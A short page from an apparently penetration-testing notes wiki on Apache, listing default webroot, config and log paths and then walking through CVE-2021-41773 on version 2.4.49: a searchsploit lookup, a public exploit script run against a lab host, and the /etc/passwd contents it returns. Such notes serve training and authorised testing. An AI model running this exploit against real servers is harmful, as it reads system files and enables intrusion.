Apache

Directories

Webroot

/var/www/html/

Config

/etc/apache2/apache2.conf (Ubuntu)
/etc/httpd/conf/httpd.conf (CentOS/RHEL/Fedora)

Logs

/var/log/apache2/ (Ubuntu)
/var/log/httpd/ (CentOS/RHEL/Fedora)

Versions

2.4.49

Vulnerable to CVE-2021-41773.

# Search for public exploits
$ searchsploit Apache httpd 2.4.49
...
--------------------------------------------------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
--------------------------------------------------------------------------

# Create a file with the target's socket
$ echo "192.168.X.245:8000" > web01_ip.txt

# Exploit the target
$ ./50383.sh web01_ip.txt /etc/passwd
http://192.168.X.245:8000
root:x:0:0:root:/root:/bin/bash
...
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh

PreviousWeb Servers NextIIS

Last updated 1 month ago

Was this helpful?